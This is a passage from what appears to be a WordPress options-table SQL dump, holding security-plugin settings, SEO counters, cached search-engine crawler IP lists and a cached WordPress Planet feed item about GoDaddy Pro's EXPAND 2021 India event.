Emails.\";}}s:11:\"definitions\";a:1:{s:6:\"events\";a:2:{s:16:\"suresend_success\";a:0:{}s:13:\"suresend_fail\";a:0:{}}}s:10:\"meta_modts\";i:1628268100;}','no'),(468231,'_site_transient_shield_mod_config_c375e78b36bce01d6675f81b6f4dd0b1','a:6:{s:4:\"slug\";s:5:\"email\";s:10:\"properties\";a:12:{s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:21:\"show_module_menu_item\";b:0;s:12:\"auto_enabled\";b:1;s:11:\"storage_key\";s:5:\"email\";s:12:\"show_central\";b:0;s:7:\"premium\";b:0;s:17:\"access_restricted\";b:1;s:18:\"run_if_whitelisted\";b:1;s:12:\"run_if_wpcli\";b:1;s:14:\"skip_processor\";b:1;s:16:\"tracking_exclude\";b:1;}s:5:\"wpcli\";a:1:{s:7:\"enabled\";b:0;}s:8:\"sections\";a:0:{}s:7:\"options\";a:0:{}s:10:\"meta_modts\";i:1628268100;}','no'),(476789,'_site_transient_timeout_apto_serviceips_apple','1634678919','no'),(476790,'_site_transient_apto_serviceips_apple','a:129:{i:0;s:12:\"17.58.102.65\";i:1;s:12:\"17.58.98.251\";i:2;s:12:\"17.58.102.76\";i:3;s:14:\"17.121.115.222\";i:4;s:14:\"17.121.114.135\";i:5;s:14:\"17.121.112.148\";i:6;s:14:\"17.121.112.244\";i:7;s:14:\"17.121.112.231\";i:8;s:13:\"17.121.112.62\";i:9;s:14:\"17.121.114.151\";i:10;s:14:\"17.121.114.190\";i:11;s:13:\"17.121.112.73\";i:12;s:14:\"17.121.113.138\";i:13;s:14:\"17.121.112.141\";i:14;s:13:\"17.121.113.47\";i:15;s:13:\"17.121.115.97\";i:16;s:14:\"17.121.115.174\";i:17;s:14:\"17.121.113.139\";i:18;s:14:\"17.121.113.152\";i:19;s:14:\"17.121.114.160\";i:20;s:14:\"17.121.113.146\";i:21;s:14:\"17.121.115.111\";i:22;s:13:\"17.121.115.47\";i:23;s:13:\"17.121.113.58\";i:24;s:14:\"17.121.113.172\";i:25;s:13:\"17.121.113.30\";i:26;s:13:\"17.121.115.75\";i:27;s:14:\"17.121.115.124\";i:28;s:13:\"17.121.114.37\";i:29;s:14:\"17.121.114.237\";i:30;s:14:\"17.121.113.176\";i:31;s:13:\"17.121.114.72\";i:32;s:14:\"17.121.115.220\";i:33;s:13:\"17.121.112.67\";i:34;s:14:\"17.121.114.198\";i:35;s:14:\"17.121.114.220\";i:36;s:14:\"17.121.112.133\";i:37;s:13:\"17.121.114.39\";i:38;s:14:\"17.121.113.120\";i:39;s:14:\"17.121.113.104\";i:40;s:14:\"17.121.112.207\";i:41;s:13:\"17.121.113.27\";i:42;s:13:\"17.121.113.52\";i:43;s:14:\"17.121.114.139\";i:44;s:14:\"17.121.114.158\";i:45;s:14:\"17.121.115.110\";i:46;s:13:\"17.121.115.87\";i:47;s:14:\"17.121.114.202\";i:48;s:14:\"17.121.115.179\";i:49;s:13:\"17.121.112.13\";i:50;s:14:\"17.121.114.199\";i:51;s:14:\"17.121.113.206\";i:52;s:13:\"17.121.114.73\";i:53;s:14:\"17.121.112.222\";i:54;s:14:\"17.121.112.149\";i:55;s:13:\"17.121.113.33\";i:56;s:13:\"17.121.115.19\";i:57;s:14:\"17.121.112.116\";i:58;s:14:\"17.121.112.238\";i:59;s:13:\"17.121.112.76\";i:60;s:13:\"17.121.112.12\";i:61;s:13:\"17.121.114.45\";i:62;s:14:\"17.121.114.125\";i:63;s:14:\"17.121.114.120\";i:64;s:13:\"17.121.114.34\";i:65;s:14:\"17.121.115.158\";i:66;s:14:\"17.121.114.106\";i:67;s:13:\"17.121.113.64\";i:68;s:13:\"17.121.113.81\";i:69;s:14:\"17.121.112.200\";i:70;s:14:\"17.121.113.202\";i:71;s:14:\"17.121.115.235\";i:72;s:14:\"17.121.112.180\";i:73;s:13:\"17.121.115.57\";i:74;s:14:\"17.121.114.217\";i:75;s:13:\"17.121.114.94\";i:76;s:12:\"17.121.114.5\";i:77;s:14:\"17.121.112.183\";i:78;s:14:\"17.121.113.189\";i:79;s:13:\"17.121.113.28\";i:80;s:13:\"17.121.112.58\";i:81;s:14:\"17.121.112.158\";i:82;s:14:\"17.121.112.153\";i:83;s:13:\"17.121.114.85\";i:84;s:13:\"17.121.112.60\";i:85;s:13:\"17.121.113.65\";i:86;s:14:\"17.121.115.105\";i:87;s:14:\"17.121.113.153\";i:88;s:14:\"17.121.115.250\";i:89;s:14:\"17.121.115.156\";i:90;s:13:\"17.121.114.96\";i:91;s:14:\"17.121.115.175\";i:92;s:13:\"17.121.113.26\";i:93;s:14:\"17.121.115.145\";i:94;s:12:\"17.121.114.9\";i:95;s:14:\"17.121.115.107\";i:96;s:13:\"17.121.113.44\";i:97;s:14:\"17.121.113.200\";i:98;s:13:\"17.121.112.47\";i:99;s:14:\"17.121.115.172\";i:100;s:14:\"17.121.112.125\";i:101;s:13:\"17.121.115.36\";i:102;s:14:\"17.121.112.254\";i:103;s:14:\"17.121.113.184\";i:104;s:14:\"17.121.112.253\";i:105;s:13:\"17.121.115.88\";i:106;s:14:\"17.121.114.224\";i:107;s:14:\"17.121.112.146\";i:108;s:14:\"17.121.115.153\";i:109;s:14:\"17.121.113.190\";i:110;s:14:\"17.121.114.240\";i:111;s:14:\"17.121.115.238\";i:112;s:14:\"17.121.112.115\";i:113;s:14:\"17.121.114.197\";i:114;s:14:\"17.121.115.140\";i:115;s:13:\"17.121.112.50\";i:116;s:14:\"17.121.113.171\";i:117;s:14:\"17.121.112.110\";i:118;s:14:\"17.121.114.187\";i:119;s:14:\"17.121.114.162\";i:120;s:14:\"17.121.115.160\";i:121;s:13:\"17.121.114.61\";i:122;s:13:\"17.121.112.27\";i:123;s:14:\"17.121.113.102\";i:124;s:14:\"17.121.112.185\";i:125;s:14:\"17.121.113.100\";i:126;s:14:\"17.121.112.245\";i:127;s:13:\"17.121.113.55\";i:128;s:14:\"17.121.112.147\";}','no'),(510130,'_transient_timeout_wpseo_total_unindexed_posts','1632369627','no'),(510131,'_transient_wpseo_total_unindexed_posts','268','no'),(510132,'_transient_timeout_wpseo_total_unindexed_terms','1632369627','no'),(510133,'_transient_wpseo_total_unindexed_terms','56','no'),(509909,'_site_transient_timeout_apto_serviceips_baidu','1634609658','no'),(509910,'_site_transient_apto_serviceips_baidu','a:2:{i:0;s:15:\"220.181.108.117\";i:1;s:14:\"220.181.108.92\";}','no'),(477121,'_site_transient_timeout_apto_serviceips_yandex','1634665810','no'),(477122,'_site_transient_apto_serviceips_yandex','a:94:{i:0;s:13:\"93.158.161.75\";i:1;s:10:\"77.88.5.59\";i:2;s:11:\"77.88.5.226\";i:3;s:13:\"93.158.161.22\";i:4;s:11:\"77.88.5.112\";i:5;s:13:\"93.158.161.60\";i:6;s:11:\"77.88.5.217\";i:7;s:10:\"77.88.5.58\";i:8;s:11:\"77.88.5.144\";i:9;s:11:\"77.88.5.221\";i:10;s:10:\"77.88.5.34\";i:11;s:9:\"77.88.5.3\";i:12;s:10:\"77.88.5.54\";i:13;s:13:\"93.158.161.35\";i:14;s:10:\"77.88.5.40\";i:15;s:11:\"77.88.5.243\";i:16;s:11:\"77.88.5.101\";i:17;s:13:\"93.158.161.48\";i:18;s:13:\"93.158.161.20\";i:19;s:11:\"77.88.5.218\";i:20;s:10:\"77.88.5.77\";i:21;s:10:\"77.88.5.25\";i:22;s:11:\"77.88.5.232\";i:23;s:10:\"77.88.5.53\";i:24;s:11:\"77.88.5.228\";i:25;s:13:\"93.158.161.41\";i:26;s:10:\"77.88.5.93\";i:27;s:13:\"93.158.161.69\";i:28;s:11:\"77.88.5.156\";i:29;s:13:\"5.255.231.113\";i:30;s:13:\"93.158.161.43\";i:31;s:11:\"77.88.5.135\";i:32;s:11:\"77.88.5.102\";i:33;s:10:\"77.88.5.83\";i:34;s:11:\"77.88.5.122\";i:35;s:11:\"77.88.5.145\";i:36;s:13:\"93.158.161.24\";i:37;s:11:\"77.88.5.238\";i:38;s:10:\"77.88.5.14\";i:39;s:11:\"77.88.5.222\";i:40;s:10:\"77.88.5.50\";i:41;s:11:\"77.88.5.167\";i:42;s:10:\"77.88.5.73\";i:43;s:10:\"77.88.5.29\";i:44;s:10:\"77.88.5.85\";i:45;s:11:\"77.88.5.157\";i:46;s:10:\"77.88.5.90\";i:47;s:11:\"77.88.5.100\";i:48;s:11:\"77.88.5.236\";i:49;s:10:\"77.88.5.43\";i:50;s:13:\"93.158.161.61\";i:51;s:13:\"93.158.161.53\";i:52;s:13:\"93.158.161.46\";i:53;s:13:\"93.158.161.38\";i:54;s:13:\"5.255.231.249\";i:55;s:12:\"5.255.231.80\";i:56;s:12:\"5.255.231.69\";i:57;s:13:\"5.255.231.135\";i:58;s:14:\"213.180.203.21\";i:59;s:13:\"5.255.231.161\";i:60;s:12:\"5.255.253.89\";i:61;s:13:\"5.255.253.116\";i:62;s:12:\"5.255.231.36\";i:63;s:15:\"213.180.203.137\";i:64;s:11:\"77.88.5.169\";i:65;s:12:\"93.158.161.9\";i:66;s:10:\"77.88.5.10\";i:67;s:11:\"77.88.5.234\";i:68;s:11:\"77.88.5.136\";i:69;s:11:\"77.88.5.120\";i:70;s:14:\"213.180.203.29\";i:71;s:13:\"5.255.253.101\";i:72;s:12:\"5.255.231.74\";i:73;s:10:\"77.88.5.47\";i:74;s:10:\"77.88.5.62\";i:75;s:10:\"77.88.5.49\";i:76;s:10:\"77.88.5.26\";i:77;s:10:\"77.88.5.96\";i:78;s:10:\"77.88.5.97\";i:79;s:11:\"77.88.5.162\";i:80;s:13:\"93.158.161.12\";i:81;s:10:\"77.88.5.60\";i:82;s:11:\"77.88.5.154\";i:83;s:11:\"77.88.5.253\";i:84;s:11:\"77.88.5.173\";i:85;s:10:\"77.88.5.46\";i:86;s:13:\"93.158.161.21\";i:87;s:10:\"77.88.5.27\";i:88;s:13:\"93.158.161.37\";i:89;s:12:\"93.158.161.6\";i:90;s:14:\"87.250.224.144\";i:91;s:13:\"95.108.213.45\";i:92;s:12:\"5.45.207.103\";i:93;s:13:\"5.255.231.206\";}','no'),(476716,'icwp_wpsf_integrations_options','a:2:{s:19:\"form_spam_providers\";a:0:{}s:19:\"user_form_providers\";a:1:{i:0;s:9:\"wordpress\";}}','yes'),(476720,'_site_transient_timeout_apto_serviceips_bing','1634689947','no'),(476721,'_site_transient_apto_serviceips_bing','a:133:{i:0;s:12:\"13.66.139.56\";i:1;s:13:\"157.55.39.232\";i:2;s:13:\"157.55.39.236\";i:3;s:12:\"13.66.139.75\";i:4;s:13:\"157.55.39.247\";i:5;s:12:\"13.66.139.58\";i:6;s:13:\"157.55.39.227\";i:7;s:13:\"207.46.13.104\";i:8;s:13:\"13.66.139.107\";i:9;s:13:\"157.55.39.139\";i:10;s:13:\"157.55.39.226\";i:11;s:11:\"13.66.139.0\";i:12;s:13:\"157.55.39.242\";i:13;s:13:\"157.55.39.230\";i:14;s:13:\"157.55.39.234\";i:15;s:13:\"157.55.39.123\";i:16;s:12:\"40.77.167.70\";i:17;s:12:\"40.77.167.73\";i:18;s:12:\"40.77.167.65\";i:19;s:12:\"40.77.167.72\";i:20;s:12:\"13.66.139.53\";i:21;s:12:\"13.66.139.77\";i:22;s:13:\"13.66.139.115\";i:23;s:13:\"13.66.139.105\";i:24;s:12:\"40.77.167.71\";i:25;s:12:\"40.77.167.67\";i:26;s:12:\"40.77.167.69\";i:27;s:11:\"40.77.167.0\";i:28;s:13:\"207.46.13.110\";i:29;s:12:\"40.77.167.68\";i:30;s:13:\"13.66.139.106\";i:31;s:13:\"13.66.139.144\";i:32;s:12:\"13.66.139.33\";i:33;s:12:\"207.46.13.41\";i:34;s:13:\"13.66.139.147\";i:35;s:12:\"13.66.139.41\";i:36;s:12:\"207.46.13.55\";i:37;s:12:\"207.46.13.37\";i:38;s:12:\"13.66.139.65\";i:39;s:12:\"13.66.139.42\";i:40;s:12:\"13.66.139.14\";i:41;s:12:\"207.46.13.51\";i:42;s:12:\"13.66.139.39\";i:43;s:12:\"207.46.13.16\";i:44;s:12:\"13.66.139.49\";i:45;s:12:\"40.77.167.26\";i:46;s:12:\"207.46.13.21\";i:47;s:12:\"207.46.13.78\";i:48;s:13:\"207.46.13.167\";i:49;s:13:\"207.46.13.166\";i:50;s:13:\"207.46.13.138\";i:51;s:12:\"40.77.167.11\";i:52;s:12:\"207.46.13.17\";i:53;s:12:\"40.77.167.78\";i:54;s:13:\"207.46.13.135\";i:55;s:12:\"207.46.13.71\";i:56;s:11:\"157.55.39.3\";i:57;s:11:\"157.55.39.1\";i:58;s:12:\"207.46.13.47\";i:59;s:12:\"157.55.39.62\";i:60;s:12:\"207.46.13.61\";i:61;s:12:\"40.77.167.10\";i:62;s:11:\"40.77.167.5\";i:63;s:12:\"207.46.13.74\";i:64;s:13:\"40.77.167.101\";i:65;s:12:\"40.77.167.24\";i:66;s:13:\"207.46.13.130\";i:67;s:12:\"157.55.39.98\";i:68;s:12:\"207.46.13.73\";i:69;s:13:\"157.55.39.154\";i:70;s:12:\"157.55.39.97\";i:71;s:13:\"207.46.13.129\";i:72;s:12:\"157.55.39.29\";i:73;s:12:\"40.77.167.25\";i:74;s:12:\"157.55.39.25\";i:75;s:13:\"207.46.13.160\";i:76;s:11:\"157.55.39.2\";i:77;s:12:\"157.55.39.74\";i:78;s:12:\"157.55.39.20\";i:79;s:13:\"207.46.13.186\";i:80;s:13:\"207.46.13.187\";i:81;s:13:\"207.46.13.148\";i:82;s:12:\"40.77.167.19\";i:83;s:12:\"40.77.167.40\";i:84;s:13:\"207.46.13.108\";i:85;s:12:\"157.55.39.90\";i:86;s:12:\"157.55.39.96\";i:87;s:13:\"157.55.39.111\";i:88;s:12:\"207.46.13.79\";i:89;s:13:\"157.55.39.164\";i:90;s:12:\"157.55.39.28\";i:91;s:13:\"157.55.39.102\";i:92;s:13:\"207.46.13.156\";i:93;s:12:\"157.55.39.95\";i:94;s:13:\"157.55.39.158\";i:95;s:13:\"207.46.13.178\";i:96;s:13:\"207.46.13.185\";i:97;s:13:\"157.55.39.107\";i:98;s:12:\"40.77.167.97\";i:99;s:13:\"207.46.13.151\";i:100;s:13:\"157.55.39.113\";i:101;s:13:\"157.55.39.188\";i:102;s:13:\"207.46.13.134\";i:103;s:13:\"207.46.13.161\";i:104;s:12:\"157.55.39.87\";i:105;s:12:\"40.77.167.64\";i:106;s:13:\"207.46.13.165\";i:107;s:12:\"157.55.39.75\";i:108;s:12:\"207.46.13.27\";i:109;s:12:\"40.77.167.81\";i:110;s:12:\"207.46.13.65\";i:111;s:13:\"157.55.39.184\";i:112;s:12:\"207.46.13.50\";i:113;s:12:\"157.55.39.70\";i:114;s:13:\"207.46.13.183\";i:115;s:13:\"207.46.13.174\";i:116;s:13:\"157.55.39.177\";i:117;s:12:\"207.46.13.18\";i:118;s:12:\"207.46.13.59\";i:119;s:13:\"207.46.13.142\";i:120;s:12:\"40.77.167.88\";i:121;s:12:\"207.46.13.24\";i:122;s:12:\"40.77.167.66\";i:123;s:12:\"40.77.167.17\";i:124;s:13:\"207.46.13.175\";i:125;s:13:\"207.46.13.170\";i:126;s:12:\"207.46.13.80\";i:127;s:13:\"207.46.13.113\";i:128;s:13:\"157.55.39.109\";i:129;s:12:\"207.46.13.75\";i:130;s:12:\"157.55.39.31\";i:131;s:11:\"157.55.39.8\";i:132;s:12:\"157.55.39.64\";}','no'),(476745,'_site_transient_timeout_apto_serviceips_google','1633742893','no'),(476746,'_site_transient_apto_serviceips_google','a:155:{i:0;s:13:\"66.249.73.146\";i:1;s:13:\"66.249.73.148\";i:2;s:13:\"66.249.73.150\";i:3;s:12:\"66.249.65.84\";i:4;s:12:\"66.249.65.85\";i:5;s:13:\"66.249.65.111\";i:6;s:12:\"66.249.65.86\";i:7;s:12:\"66.249.65.83\";i:8;s:12:\"66.249.65.82\";i:9;s:12:\"66.249.75.15\";i:10;s:12:\"66.249.75.13\";i:11;s:12:\"66.249.75.70\";i:12;s:12:\"66.249.75.68\";i:13;s:12:\"66.249.75.72\";i:14;s:13:\"66.249.72.238\";i:15;s:12:\"66.249.65.87\";i:16;s:13:\"66.249.65.110\";i:17;s:13:\"66.249.65.113\";i:18;s:12:\"66.249.75.69\";i:19;s:12:\"66.249.75.71\";i:20;s:12:\"66.249.75.83\";i:21;s:12:\"66.249.75.85\";i:22;s:12:\"66.249.75.73\";i:23;s:13:\"66.249.72.236\";i:24;s:12:\"66.249.75.95\";i:25;s:12:\"66.249.75.64\";i:26;s:12:\"66.249.75.91\";i:27;s:12:\"66.249.75.90\";i:28;s:12:\"66.249.75.92\";i:29;s:13:\"66.249.65.217\";i:30;s:13:\"66.249.73.132\";i:31;s:13:\"66.249.73.158\";i:32;s:12:\"66.249.75.66\";i:33;s:13:\"66.249.72.242\";i:34;s:12:\"66.249.75.93\";i:35;s:13:\"66.249.72.244\";i:36;s:13:\"66.249.73.155\";i:37;s:13:\"66.249.73.129\";i:38;s:13:\"66.249.73.151\";i:39;s:13:\"66.249.73.153\";i:40;s:13:\"66.249.65.222\";i:41;s:13:\"66.249.65.215\";i:42;s:13:\"66.249.65.213\";i:43;s:13:\"66.249.72.246\";i:44;s:13:\"66.249.73.149\";i:45;s:13:\"66.249.65.192\";i:46;s:13:\"66.249.65.223\";i:47;s:13:\"66.249.73.156\";i:48;s:13:\"66.249.73.130\";i:49;s:13:\"66.249.69.193\";i:50;s:13:\"66.249.73.128\";i:51;s:13:\"66.249.69.222\";i:52;s:13:\"66.249.69.217\";i:53;s:13:\"66.249.75.183\";i:54;s:13:\"66.249.69.219\";i:55;s:13:\"66.249.75.181\";i:56;s:13:\"66.249.75.170\";i:57;s:13:\"66.249.69.196\";i:58;s:13:\"66.249.75.179\";i:59;s:13:\"66.249.69.215\";i:60;s:12:\"66.249.65.91\";i:61;s:12:\"66.249.65.77\";i:62;s:12:\"66.249.65.92\";i:63;s:13:\"66.249.65.106\";i:64;s:13:\"66.249.75.187\";i:65;s:12:\"66.249.79.41\";i:66;s:13:\"66.249.75.189\";i:67;s:13:\"66.249.69.214\";i:68;s:13:\"66.249.69.212\";i:69;s:13:\"66.249.69.216\";i:70;s:13:\"66.249.69.223\";i:71;s:13:\"66.249.69.221\";i:72;s:13:\"66.249.75.166\";i:73;s:13:\"66.249.69.220\";i:74;s:13:\"66.249.75.191\";i:75;s:13:\"66.249.75.175\";i:76;s:13:\"66.249.65.102\";i:77;s:12:\"66.249.70.31\";i:78;s:12:\"66.249.70.63\";i:79;s:12:\"66.249.70.32\";i:80;s:12:\"66.249.70.54\";i:81;s:12:\"66.249.70.58\";i:82;s:11:\"66.249.70.8\";i:83;s:12:\"66.249.70.27\";i:84;s:12:\"66.249.70.61\";i:85;s:13:\"66.249.64.251\";i:86;s:13:\"66.249.64.248\";i:87;s:12:\"66.249.65.89\";i:88;s:12:\"66.249.65.88\";i:89;s:13:\"66.249.65.125\";i:90;s:12:\"66.249.65.90\";i:91;s:13:\"66.249.65.123\";i:92;s:13:\"66.249.65.104\";i:93;s:13:\"66.249.65.127\";i:94;s:13:\"66.249.64.245\";i:95;s:13:\"66.249.64.254\";i:96;s:13:\"66.249.64.247\";i:97;s:13:\"66.249.64.249\";i:98;s:13:\"66.249.64.224\";i:99;s:13:\"66.249.64.252\";i:100;s:12:\"66.249.70.42\";i:101;s:13:\"66.249.65.182\";i:102;s:12:\"66.249.65.75\";i:103;s:12:\"66.249.65.79\";i:104;s:13:\"66.249.65.189\";i:105;s:13:\"66.249.65.191\";i:106;s:13:\"66.249.65.184\";i:107;s:13:\"66.249.65.186\";i:108;s:13:\"66.249.69.218\";i:109;s:13:\"66.249.69.192\";i:110;s:13:\"66.249.75.168\";i:111;s:11:\"66.249.75.3\";i:112;s:11:\"66.249.75.5\";i:113;s:11:\"66.249.75.9\";i:114;s:12:\"66.249.69.27\";i:115;s:12:\"66.249.75.28\";i:116;s:12:\"66.249.75.29\";i:117;s:12:\"66.249.69.29\";i:118;s:12:\"66.249.75.19\";i:119;s:13:\"66.249.64.231\";i:120;s:13:\"66.249.65.160\";i:121;s:13:\"66.249.65.168\";i:122;s:13:\"66.249.64.233\";i:123;s:12:\"66.249.70.59\";i:124;s:13:\"66.249.64.234\";i:125;s:13:\"66.249.64.229\";i:126;s:13:\"66.249.64.225\";i:127;s:12:\"66.249.70.45\";i:128;s:13:\"66.249.64.230\";i:129;s:12:\"66.249.70.47\";i:130;s:13:\"66.249.64.227\";i:131;s:13:\"66.249.64.228\";i:132;s:13:\"66.249.64.253\";i:133;s:13:\"66.249.65.180\";i:134;s:13:\"66.249.65.176\";i:135;s:13:\"66.249.65.165\";i:136;s:13:\"66.249.65.167\";i:137;s:13:\"66.249.65.178\";i:138;s:13:\"66.249.65.169\";i:139;s:12:\"66.249.65.76\";i:140;s:13:\"66.249.65.103\";i:141;s:13:\"66.249.65.116\";i:142;s:13:\"66.249.65.114\";i:143;s:13:\"66.249.65.244\";i:144;s:13:\"66.249.65.105\";i:145;s:13:\"66.249.65.101\";i:146;s:13:\"66.249.65.112\";i:147;s:12:\"66.249.65.98\";i:148;s:13:\"66.249.65.248\";i:149;s:13:\"66.249.65.253\";i:150;s:13:\"66.249.65.246\";i:151;s:12:\"66.249.65.99\";i:152;s:13:\"66.249.65.108\";i:153;s:12:\"66.249.65.97\";i:154;s:13:\"66.249.65.225\";}','no'),(511103,'_site_transient_timeout_apto-db-ready-0d35025fc8','1632334412','no'),(510395,'_transient_timeout_wpseo_total_unindexed_general_items','1632402173','no'),(510396,'_transient_wpseo_total_unindexed_general_items','1','no'),(510241,'_transient_timeout_feed_mod_9bbd59226dc36b9b26cd43f15694c5c3','1632355326','no'),(510242,'_transient_feed_mod_9bbd59226dc36b9b26cd43f15694c5c3','1632312126','no'),(510244,'_transient_feed_d117b5738fbd35bd8c0391cda1f2b5d9','a:4:{s:5:\"child\";a:1:{s:0:\"\";a:1:{s:3:\"rss\";a:1:{i:0;a:6:{s:4:\"data\";s:3:\"\n\n\n\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:7:\"version\";s:3:\"2.0\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:1:{s:7:\"channel\";a:1:{i:0;a:6:{s:4:\"data\";s:61:\"\n	\n	\n	\n	\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"WordPress Planet\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://planet.wordpress.org/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"language\";a:1:{i:0;a:5:{s:4:\"data\";s:2:\"en\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:47:\"WordPress Planet - http://planet.wordpress.org/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"item\";a:50:{i:0;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:79:\"WPTavern: GoDaddy Pro To Host Second EXPAND 2021 Event on September 24 in India\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=122816\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:203:\"https://wptavern.com/godaddy-pro-to-host-second-expand-2021-event-on-september-24-in-india?utm_source=rss&utm_medium=rss&utm_campaign=godaddy-pro-to-host-second-expand-2021-event-on-september-24-in-india\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4901:\"<p class=\"has-drop-cap\">GoDaddy Pro will kick off <a href=\"https://events.godaddy.com/events/details/godaddy-events-godaddy-pro-india-presents-expand-2021-india/?code=tavern\">EXPAND 2021 &ndash; India</a> on September 24, the second event of its kind this year. It is a one-day virtual conference that will feature sessions from industry leaders and experts in the field.</p>\n\n\n\n<p>Nikhil Arora, the Vice President and Managing Director for GoDaddy India, will present the keynote address. In total, there will be nine sessions that will run between 15 and 45 minutes throughout the day. The goal is to provide guidance and resources for those starting and growing digital businesses.</p>\n\n\n\n<p>GoDaddy Pro <a href=\"https://wptavern.com/godaddy-pro-will-kick-off-2-day-expand-event-on-april-27\">launched its first event</a>, EXPAND 2021 &ndash; U.S., in late April. Over 5,000 people registered for the two-day virtual conference. However, tens of thousands more have viewed individual sessions since then. Each session is <a href=\"https://www.youtube.com/watch?v=K_Ws_e49i_4&list=PLUFaBQ_KBkWCG80Lmx6xxeeDYYsNLZV94\">available for free viewing</a> via the GoDaddy Pro YouTube channel, and new videos will be added for future events.</p>\n\n\n\n<p>When Adam Warner, the Global Field Marketing Sr. Manager at GoDaddy, spoke of the event earlier this year, he described it as a project he had wanted to do since 2018. For him, it was a way of giving back to the community and helping the next generation along.</p>\n\n\n\n<p>&ldquo;I&rsquo;m pleased with how our EXPAND conference series is growing and the feedback we&rsquo;ve received from attendees so far,&rdquo; he said. &ldquo;The overarching goal of EXPAND is to showcase the solutions that our Pros are providing for their clients, and to do so in a way that both inspires and educates others to follow their passion for building the web and their own businesses.&rdquo;</p>\n\n\n\n<p>The first event did not go off without any bumps in the road. The team learned from it and will tweak things to improve the conference.</p>\n\n\n\n<p>&ldquo;One important lesson we learned from our first EXPAND event was to clearly define chat moderation roles and increase the amount of pre-written platform navigation directions and tips for our Guides to share with attendees in the general and session chats areas,&rdquo; said Warner. &ldquo;When our event started, we were walking over ourselves a bit. The chat conversations move so fast, we ended up duplicating a few replies, coming from multiple people.&rdquo;</p>\n\n\n\n<p>The EXPAND 2021 &ndash; India conference will be different than the inaugural event held earlier this year. Instead of focusing on a more general or U.S. audience, GoDaddy Pro is leaning into its regional teams and members.</p>\n\n\n\n<p>&ldquo;All the speakers are from India, as well as the Pros whose stories will be featured,&rdquo; said Warner. &ldquo;We have dedicated GoDaddy and GoDaddy Pro teams in India, and they&rsquo;ve played a lead role in defining the best approach for the Indian audience. The biggest challenge with putting this event together so far has been the differences in time zones for our multiple teams. We&rsquo;ve tried to accommodate everyone&rsquo;s schedules as much as possible.&rdquo;</p>\n\n\n\n<p>The GoDaddy Pro team is already planning EXPAND 2022 events. Warner said those interested to be on the lookout over the next couple of months for more news.</p>\n\n\n\n<p>&ldquo;To date, our EXPAND conferences run parallel with our location-specific launches of the GoDaddy Pro brand,&rdquo; he said. &ldquo;As GoDaddy Pro continues to grow, and when the world gets back to in-person events globally, we would love to accommodate attendees in multiple physical locations.&rdquo;</p>\n\n\n\n<p>One glaring issue for the India event is the lack of gender diversity within its speaker group. Only one woman is leading a session. I asked Warner why there was such an imbalance.</p>\n\n\n\n<p>&ldquo;The number of women in the technology sector in India has been a matter of concern for small and large businesses alike,&rdquo; said Warner. &ldquo;GoDaddy is an <a href=\"https://careers.godaddy.com/diversity\">inviting place to work</a> and an industry leader for women in technology. We are actively working to create platforms and ecosystems to encourage more women to join the fray. We are delighted to have Kriti Aggarwal, Founder of Anaha Services, join us at this year&rsquo;s EXPAND Event in India and are focused on all future EXPAND Conferences recognizing diverse groups of leaders in their sectors.&rdquo;</p>\n\n\n\n<p>The team is holding two Meetups each week. Yesterday was an <a href=\"https://twitter.com/GoDaddyPro/status/1439994009192108039\">all-female panel</a> of GoDaddy and GoDaddy Pro team members in prep for their sponsorship of <a href=\"https://femtechconf.com/\">FemTechConf</a>, held between September 24 and 25.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 21 Sep 2021 21:36:23 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Justin 